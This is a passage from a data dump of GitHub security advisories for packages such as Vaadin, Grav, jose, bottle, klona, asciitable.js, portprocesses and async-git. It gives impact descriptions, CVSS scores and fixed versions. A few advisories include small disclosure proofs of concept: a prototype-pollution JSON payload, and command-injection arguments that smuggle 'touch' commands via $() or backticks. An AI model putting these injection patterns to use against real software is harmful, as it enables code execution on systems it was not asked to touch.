'Maven', 'name': 'com.vaadin:flow-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '5.0.4'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:flow-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.1'}]}], 'versions': ['6.0.0']}]","[{'type': 'WEB', 'url': 'https://github.com/vaadin/flow/security/advisories/GHSA-p7jq-v8jp-j424'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-31406'}, {'type': 'WEB', 'url': 'https://github.com/vaadin/flow/pull/10157'}, {'type': 'WEB', 'url': 'https://vaadin.com/security/cve-2021-31406'}]","{'cwe_ids': ['CWE-203', 'CWE-208'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-16T23:15:49Z', 'nvd_published_at': '2021-04-23T16:15:00Z'}" +1.4.0,GHSA-867q-77cc-98mv,2021-05-10T19:29:52Z,2021-04-29T21:51:37Z,,['CVE-2021-21429'],Creation of Temporary File in Directory with Insecure Permissions in the OpenAPI Generator Maven plugin,"### Impact + +Using `File.createTempFile` in JDK will result in creating and using insecure temporary files that can leave application and system data vulnerable to attacks. This vulnerability only impacts unix-like systems where the local system temporary directory is shared between all users. This vulnerability does not impact Windows or modern versions of MacOS. + +OpenAPI Generator Maven plug-in creates insecure temporary files during the code generation process. It creates insecure temporary files to store the OpenAPI specification files provided by the users and these temporary files can be read by any users in the system. + +The impact of this vulnerability is information disclosure of the contents of the specification file to other local users. + +### Patches +The issue has been patched with `Files.createTempFile` and released in the v5.1.0 stable version. + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [OpenAPI Generator Github repo](https://github.com/openAPITools/openapi-generator/) +* Email us at [security@openapitools.org](mailto:security@openapitools.org)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.openapitools:openapi-generator-maven-plugin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.1.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/OpenAPITools/openapi-generator/security/advisories/GHSA-867q-77cc-98mv'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21429'}, {'type': 'WEB', 'url': 'https://github.com/OpenAPITools/openapi-generator/pull/8795'}, {'type': 'WEB', 'url': 'https://github.com/OpenAPITools/openapi-generator/blob/06ad7a51eff04393203cfa715e54e1fb59d984fe/modules/openapi-generator-maven-plugin/src/main/java/org/openapitools/codegen/plugin/CodeGenMojo.java#L782-L799'}]","{'cwe_ids': ['CWE-377', 'CWE-378', 'CWE-379', 'CWE-552'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-27T19:58:51Z', 'nvd_published_at': '2021-04-27T20:15:00Z'}" +1.4.0,GHSA-g8r4-p96j-xfxc,2022-08-11T00:01:25Z,2021-04-16T19:53:12Z,,['CVE-2021-29440'],Grav's Twig processing allowing dangerous PHP functions by default,"### Impact + +Twig processing of static pages can be enabled in the front matter by any administrative user allowed to create or edit pages. +As the Twig processor runs unsandboxed, this behavior can be used to gain arbitrary code execution and elevate privileges on the instance. + +### Patches + +The issue was addressed by preventing dangerous functions from being called in Twig templates. A configuration option has been added to manually allow arbitrary PHP functions (`system.twig.safe_functions`) and filters (`system.twig.safe_filters`). + +Futures major versions of Grav may disable this functionality by default. + +### Workarounds + +Blocking access to the `/admin` path from untrusted sources will reduce the probability of exploitation. + +### References + +- https://portswigger.net/research/server-side-template-injection +- https://blog.sonarsource.com/grav-cms-code-execution-vulnerabilities + +### For more information + +If you have any questions or comments about this advisory, you can contact: + - The original reporters, by sending an email to vulnerability.research [at] sonarsource.com; + - The maintainers, by opening an issue on this repository.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'getgrav/grav'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.7.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.7.10'}}]","[{'type': 'WEB', 'url': 'https://github.com/getgrav/grav/security/advisories/GHSA-g8r4-p96j-xfxc'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29440'}, {'type': 'WEB', 'url': 'https://blog.sonarsource.com/grav-cms-code-execution-vulnerabilities'}, {'type': 'WEB', 'url': 'https://packagist.org/packages/getgrav/grav'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/162987/Grav-CMS-1.7.10-Server-Side-Template-Injection.html'}]","{'cwe_ids': ['CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-13T19:55:46Z', 'nvd_published_at': '2021-04-13T20:15:00Z'}" +1.4.0,GHSA-94hh-pjjg-rwmr,2023-03-17T17:49:50Z,2021-04-19T14:58:49Z,,['CVE-2021-29444'],Padding Oracle Attack due to Observable Timing Discrepancy in jose-browser-runtime,"### Impact + +[AES_CBC_HMAC_SHA2 Algorithm](https://tools.ietf.org/html/rfc7518#section-5.2) (A128CBC-HS256, A192CBC-HS384, A256CBC-HS512) decryption would always execute both HMAC tag verification and CBC decryption, if either failed `JWEDecryptionFailed` would be thrown. But a possibly observable difference in timing when padding error would occur while decrypting the ciphertext makes a padding oracle and an adversary might be able to make use of that oracle to decrypt data without knowing the decryption key by issuing on average 128*b calls to the padding oracle (where b is the number of bytes in the ciphertext block). + +### Patches + +A patch was released which ensures the HMAC tag is verified before performing CBC decryption. The fixed versions are `>=3.11.4`. + +Users should upgrade to `^3.11.4`. + +### Credits +Thanks to Morgan Brown of Microsoft for bringing this up and Eva Sarafianou (@esarafianou) for helping to score this advisory.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'jose-browser-runtime'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.11.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/panva/jose/security/advisories/GHSA-94hh-pjjg-rwmr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29444'}, {'type': 'PACKAGE', 'url': 'https://github.com/panva/jose'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/jose-browser-runtime'}]","{'cwe_ids': ['CWE-203'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-16T23:00:49Z', 'nvd_published_at': '2021-04-16T22:15:00Z'}" +1.4.0,GHSA-rj44-gpjc-29r7,2021-03-30T20:20:04Z,2021-04-06T17:22:41Z,,['CVE-2021-21412'],[thi.ng/egf] Potential arbitrary code execution of `#gpg`-tagged property values,"### Impact + +Potential for arbitrary code execution in `#gpg`-tagged property values (only if `decrypt: true` option is enabled) + +### Patches + +[A fix](https://github.com/thi-ng/umbrella/commit/3e14765d6bfd8006742c9e7860bc7d58ae94dfa5) has already been released as v0.4.0 + +### Workarounds + +By default, EGF parse functions do NOT attempt to decrypt values (since GPG is only available in non-browser env). + +However, if GPG encrypted values are used/required: + +1. Perform a regex search for `#gpg`-tagged values in the EGF source file/string and check for backtick (\`) chars in the encrypted value string +2. Replace/remove them or skip parsing if present... + +### References + +https://github.com/thi-ng/umbrella/security/advisories/GHSA-rj44-gpjc-29r7#advisory-comment-65261 + +### For more information + +If you have any questions or comments about this advisory, please open an issue in the [thi.ng/umbrella repo](https://github.com/thi-ng/umbrella/issues), of which this package is part of.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': '@thi.ng/egf'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.4.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/thi-ng/umbrella/security/advisories/GHSA-rj44-gpjc-29r7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21412'}, {'type': 'WEB', 'url': 'https://github.com/thi-ng/umbrella/commit/88f61656e5f5cfba960013b8133186389efaf243'}, {'type': 'WEB', 'url': 'https://github.com/thi-ng/umbrella/blob/develop/packages/egf/CHANGELOG.md#040-2021-03-27'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/@thi.ng/egf'}]","{'cwe_ids': ['CWE-78'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-30T17:40:22Z', 'nvd_published_at': '2021-03-30T18:15:00Z'}" +1.4.0,GHSA-3rh3-wfr4-76mj,2021-04-30T17:30:42Z,2021-04-06T17:28:41Z,,['CVE-2021-21391'],Regular expression Denial of Service in multiple packages," +### Impact +A regular expression denial of service (ReDoS) vulnerability has been discovered in multiple CKEditor 5 packages. The vulnerability allowed to abuse particular regular expressions, which could cause a significant performance drop resulting in a browser tab freeze. It affects all users using the CKEditor 5 packages listed above at version <= 26.0.0. + +### Patches +The problem has been recognized and patched. The fix will be available in version 27.0.0. + +### For more information +Email us at security@cksource.com if you have any questions or comments about this advisory. + +### Acknowledgements +The CKEditor 5 team would like to thank Yeting Li for recognizing and reporting these vulnerabilities.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': '@ckeditor/ckeditor5-engine'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '27.0.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 26.0.0'}}, {'package': {'ecosystem': 'npm', 'name': '@ckeditor/ckeditor5-font'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '27.0.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 26.0.0'}}, {'package': {'ecosystem': 'npm', 'name': '@ckeditor/ckeditor5-image'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '27.0.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 26.0.0'}}, {'package': {'ecosystem': 'npm', 'name': '@ckeditor/ckeditor5-list'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '27.0.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 26.0.0'}}, {'package': {'ecosystem': 'npm', 'name': '@ckeditor/ckeditor5-markdown-gfm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '27.0.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 26.0.0'}}, {'package': {'ecosystem': 'npm', 'name': '@ckeditor/ckeditor5-media-embed'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '27.0.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 26.0.0'}}, {'package': {'ecosystem': 'npm', 'name': '@ckeditor/ckeditor5-paste-from-office'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '27.0.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 26.0.0'}}, {'package': {'ecosystem': 'npm', 'name': '@ckeditor/ckeditor5-widget'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '27.0.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 26.0.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/ckeditor/ckeditor5/security/advisories/GHSA-3rh3-wfr4-76mj'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21391'}, {'type': 'WEB', 'url': 'https://github.com/ckeditor/ckeditor5/releases/tag/v27.0.0'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/@ckeditor/ckeditor5-engine'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/@ckeditor/ckeditor5-font'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/@ckeditor/ckeditor5-image'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/@ckeditor/ckeditor5-list'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/@ckeditor/ckeditor5-markdown-gfm'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/@ckeditor/ckeditor5-media-embed'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/@ckeditor/ckeditor5-paste-from-office'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/@ckeditor/ckeditor5-widget'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-31T18:37:46Z', 'nvd_published_at': '2021-04-29T01:15:00Z'}" +1.4.0,GHSA-rfw2-x9f8-2f6m,2021-04-28T19:21:42Z,2021-04-30T17:27:53Z,,['CVE-2021-26722'],Cross-Site Scripting,"LinkedIn Oncall through 1.4.0 allows reflected XSS via /query because of mishandling of the ""No results found for"" message in the search bar.",[],"[{'package': {'ecosystem': 'PyPI', 'name': 'oncall'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-26722'}, {'type': 'WEB', 'url': 'https://github.com/linkedin/oncall/issues/341'}, {'type': 'WEB', 'url': 'https://github.com/linkedin/oncall/commit/843bc106a1c1b1699e9e52b6b0d01c7efe1d6225'}, {'type': 'WEB', 'url': 'https://pypi.org/project/oncall/'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-28T19:21:42Z', 'nvd_published_at': '2021-02-05T18:15:00Z'}" +1.4.0,GHSA-qhx9-7hx7-cp4r,2023-09-05T14:37:12Z,2021-04-07T21:05:21Z,,['CVE-2020-28473'],bottle HTTP Request smuggling,"The package bottle before 0.12.19 are vulnerable to Web Cache Poisoning by using a vector called parameter cloaking. When the attacker can separate query parameters using a semicolon (;), they can cause a difference in the interpretation of the request between the proxy (running with default configuration) and the server. This can result in malicious requests being cached as completely safe ones, as the proxy would usually not see the semicolon as a separator, and therefore would not include it in a cache key of an unkeyed parameter.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'bottle'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.12.19'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28473'}, {'type': 'WEB', 'url': 'https://github.com/bottlepy/bottle/commit/57a2f22e0c1d2b328c4f54bf75741d74f47f1a6b'}, {'type': 'PACKAGE', 'url': 'https://github.com/bottlepy/bottle'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/01/msg00019.html'}, {'type': 'WEB', 'url': 'https://snyk.io/blog/cache-poisoning-in-popular-open-source-packages/'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-PYTHON-BOTTLE-1017108'}]","{'cwe_ids': ['CWE-444'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-06T20:59:20Z', 'nvd_published_at': '2021-01-18T12:15:00Z'}" +1.4.0,GHSA-cmc7-mfmr-xqrx,2021-04-06T21:58:49Z,2021-04-07T21:01:25Z,,['CVE-2021-3116'],Logic error in authentication in proxy.py,before_upstream_connection in AuthPlugin in http/proxy/auth.py in proxy.py before 2.3.1 accepts incorrect Proxy-Authorization header data because of a boolean confusion (and versus or).,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'proxy.py'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3116'}, {'type': 'WEB', 'url': 'https://github.com/abhinavsingh/proxy.py/pull/482/commits/9b00093288237f5073c403f2c4f62acfdfa8ed46'}, {'type': 'WEB', 'url': 'https://cardaci.xyz/advisories/2021/01/10/proxy.py-2.3.0-broken-basic-authentication/'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-cmc7-mfmr-xqrx'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/proxy-py/PYSEC-2021-46.yaml'}, {'type': 'WEB', 'url': 'https://pypi.org/project/proxy.py/2.3.1/#history'}]","{'cwe_ids': ['CWE-287', 'CWE-480'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-06T21:58:49Z', 'nvd_published_at': '2021-01-11T05:15:00Z'}" +1.4.0,GHSA-q74r-4xw3-ppx9,2021-04-16T23:15:34Z,2021-04-19T14:49:48Z,,['CVE-2019-25028'],Stored cross-site scripting in Grid component in Vaadin 7 and 8,"Missing variable sanitization in `Grid` component in `com.vaadin:vaadin-server` versions 7.4.0 through 7.7.19 (Vaadin 7.4.0 through 7.7.19), and 8.0.0 through 8.8.4 (Vaadin 8.0.0 through 8.8.4) allows attacker to inject malicious JavaScript via unspecified vector. + +- https://vaadin.com/security/cve-2019-25028","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin-bom'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.4.0'}, {'fixed': '7.7.20'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin-bom'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.8.5'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.4.0'}, {'fixed': '7.7.20'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.8.5'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/vaadin/framework/security/advisories/GHSA-q74r-4xw3-ppx9'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-25028'}, {'type': 'WEB', 'url': 'https://github.com/vaadin/framework/pull/11644'}, {'type': 'WEB', 'url': 'https://github.com/vaadin/framework/pull/11645'}, {'type': 'WEB', 'url': 'https://vaadin.com/security/cve-2019-25028'}]","{'cwe_ids': ['CWE-79', 'CWE-80'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-16T23:15:34Z', 'nvd_published_at': '2021-04-23T16:15:00Z'}" +1.4.0,GHSA-8f89-2fwj-5v5r,2021-03-30T16:22:33Z,2021-04-13T15:41:24Z,,['CVE-2020-8125'],Improper Input Validation in klona,Flaw in input validation in npm package klona version 1.1.0 and earlier may allow prototype pollution attack that may result in remote code execution or denial of service of applications using klona.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'klona'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.1.0'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-8125'}, {'type': 'WEB', 'url': 'https://github.com/lukeed/klona/commit/200e8d1fd383a54790ee6fc8228264c21954e38e'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/778414'}]","{'cwe_ids': ['CWE-20'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-30T16:22:33Z', 'nvd_published_at': '2020-02-04T20:15:00Z'}" +1.4.0,GHSA-2wqp-jmcc-mc77,2021-04-16T23:13:14Z,2021-04-19T14:47:34Z,,['CVE-2021-31405'],Regular expression denial of service (ReDoS) in EmailField component in Vaadin 14 and 15-17,"Unsafe validation RegEx in `EmailField` component in `com.vaadin:vaadin-text-field-flow` versions 2.0.4 through 2.3.2 (Vaadin 14.0.6 through 14.4.3), and 3.0.0 through 4.0.2 (Vaadin 15.0.0 through 17.0.10) allows attackers to cause uncontrolled resource consumption by submitting malicious email addresses. + +- https://vaadin.com/security/cve-2021-31405","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin-bom'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.0.6'}, {'fixed': '14.4.4'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin-bom'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '15.0.0'}, {'fixed': '17.0.11'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/vaadin/platform/security/advisories/GHSA-2wqp-jmcc-mc77'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-31405'}, {'type': 'WEB', 'url': 'https://github.com/vaadin/flow-components/pull/442'}, {'type': 'WEB', 'url': 'https://vaadin.com/security/cve-2021-31405'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-16T23:13:14Z', 'nvd_published_at': '2021-04-23T16:15:00Z'}" +1.4.0,GHSA-5pxj-mhwj-x5gv,2023-09-11T18:53:26Z,2021-04-13T15:24:59Z,,['CVE-2020-7771'],Prototype Pollution in asciitable.js,"The package asciitable.js before 1.0.3 is vulnerable to Prototype Pollution via the main function. + +### PoC +```js +var a = require(""asciitable.js""); +var b = JSON.parse('{""__proto__"":{""test"":123}}'); +a({},b); +console.log({}.test) +```","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'asciitable.js'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7771'}, {'type': 'WEB', 'url': 'https://github.com/victornpb/asciitable.js/pull/1'}, {'type': 'WEB', 'url': 'https://github.com/victornpb/asciitable.js/commit/8db8fc5ffa7a2a6e8596709d99b200afb53f40ab'}, {'type': 'PACKAGE', 'url': 'https://github.com/victornpb/asciitable.js'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-ASCIITABLEJS-1039799'}]","{'cwe_ids': ['CWE-400'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-04-06T23:32:45Z', 'nvd_published_at': '2021-01-04T12:15:00Z'}" +1.4.0,GHSA-vm67-7vmg-66vm,2021-03-31T17:50:32Z,2021-04-06T17:24:50Z,,['CVE-2021-23348'],Arbitrary Command Injection in portprocesses,"### Impact + +An Arbitrary Command Injection vulnerability was reported in `portprocesses` impacting versions <= 1.0.4. + +### Example (Proof of Concept) + +The following example demonstrates the vulnerability and will run `touch success` therefore creating a file named `success`. + +```js +const portprocesses = require(""portprocesses""); + +portprocesses.killProcess(""$(touch success)""); +```","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'portprocesses'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.5'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/rrainn/PortProcesses/security/advisories/GHSA-vm67-7vmg-66vm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23348'}, {'type': 'WEB', 'url': 'https://github.com/rrainn/PortProcesses/commit/86811216c9b97b01b5722f879f8c88a7aa4214e1'}, {'type': 'WEB', 'url': 'https://github.com/rrainn/PortProcesses/blob/fffceb09aff7180afbd0bd172e820404b33c8299/index.js%23L23'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-PORTPROCESSES-1078536'}]","{'cwe_ids': ['CWE-77', 'CWE-78'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-31T17:50:32Z', 'nvd_published_at': '2021-03-31T15:15:00Z'}" +1.4.0,GHSA-prmc-5v5w-c465,2021-03-31T18:09:39Z,2021-04-06T17:32:38Z,,[],Client TLS credentials sent raw to server in npm package nats,"Nats is a Node.js client for the NATS messaging system. + +## Problem Description + +_Preview versions_ of two NPM packages and one Deno package from the NATS project contain an information disclosure flaw, leaking options to the NATS server; for one package, this includes TLS private credentials. + +The _connection_ configuration options in these JavaScript-based implementations were fully serialized and sent to the server in the client's `CONNECT` message, immediately after TLS establishment. + +The nats.js client supports Mutual TLS and the credentials for the TLS client key are included in the connection configuration options; disclosure of the client's TLS private key to the server has been observed. + +Most authentication mechanisms are handled after connection, instead of as part of connection, so other authentication mechanisms are unaffected. +For clarity: NATS account NKey authentication **is NOT affected**. + +Neither the nats.ws nor the nats.deno clients support Mutual TLS: the affected versions listed below are those where the logic flaw is +present. We are including the nats.ws and nats.deno versions out of an abundance of caution, as library maintainers, but rate as minimal the likelihood of applications leaking sensitive data. + + +## Affected versions + +### Security impact + +* NPM package nats.js: + + **mainline is unaffected** + + beta branch is vulnerable from 2.0.0-201, fixed in 2.0.0-209 + +### Logic flaw + +* NPM package nats.ws: + + status: preview + + flawed from 1.0.0-85, fixed in 1.0.0-111 + +* Deno repository https://github.com/nats-io/nats.deno + + status: preview + + flawed in all git tags prior to fix + + fixed with git tag v1.0.0-9 + + +## Impact + +For deployments using TLS client certificates (for mutual TLS), private key material for TLS is leaked from the client application to the +server. If the server is untrusted (run by a third party), or if the client application also disables TLS verification (and so the true identity of the server is unverifiable) then authentication credentials are leaked. + +## Workaround + +*None* + +## Solution + +Upgrade your package dependencies to fixed versions, and then reissue any TLS client credentials (with new keys, not just new certificates) and revoke the old ones.",[],"[{'package': {'ecosystem': 'npm', 'name': 'nats'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0-201'}, {'fixed': '2.0.0-209'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.0.0-208'}}]","[{'type': 'WEB', 'url': 'https://github.com/nats-io/nats.js/security/advisories/GHSA-prmc-5v5w-c465'}, {'type': 'WEB', 'url': 'https://advisories.nats.io/CVE/CVE-2020-26149.txt'}]","{'cwe_ids': ['CWE-522'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-03-31T18:09:39Z', 'nvd_published_at': None}" +1.4.0,GHSA-6qpr-9mc5-7gch,2023-09-07T18:43:43Z,2021-04-12T19:50:20Z,,['CVE-2020-28490'],Command Injection in async-git,The package async-git before 1.13.2 are vulnerable to Command Injection via shell meta-characters (back-ticks). For example: `git.reset('atouch HACKEDb')`,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'async-git'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.13.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28490'}, {'type': 'WEB', 'url': 'https://github.com/omrilotan/async-git/pull/14'}, {'type': 'WEB', 'url': 'https://github.com/omrilotan/async-git/commit/d1950a5021f4e19d92f347614be0d85ce991510d'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-ASYNCGIT-1064877'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/async-git'}]","{'cwe_ids': ['CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-03-18T22:57:13Z', 'nvd_published_at': '2021-02-18T15:15:00Z'}" +1.4.0,GHSA-88rc-3p98-rgvx,2021-04-12T22:33:13Z,2021-04-13T15:13:48Z,,[],After order payment process manipulation in shopware/platform and shopware/core ,"### Impact + +After order payment process manipulation + +### Patches +We recommend to update to the current version 6.3.5.3. You can get the update to 6.3.5.3 regularly via the Auto-Updater or directly via the download overview. + +https://www.shopware.com/en/download/#shopware-6 + +### Workarounds + +For older versions of 6.1 and 6.2, corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version. + +https://store.shopware.com/en/detail/index/sArticle/518463/number/Swag136939272659 + +### For more information +https://docs.shopware.com/en/shopware-6-en/security-updates/security-update-04-2021",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'shopware/platform'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.3.5.3'}]}], 'database_specific': 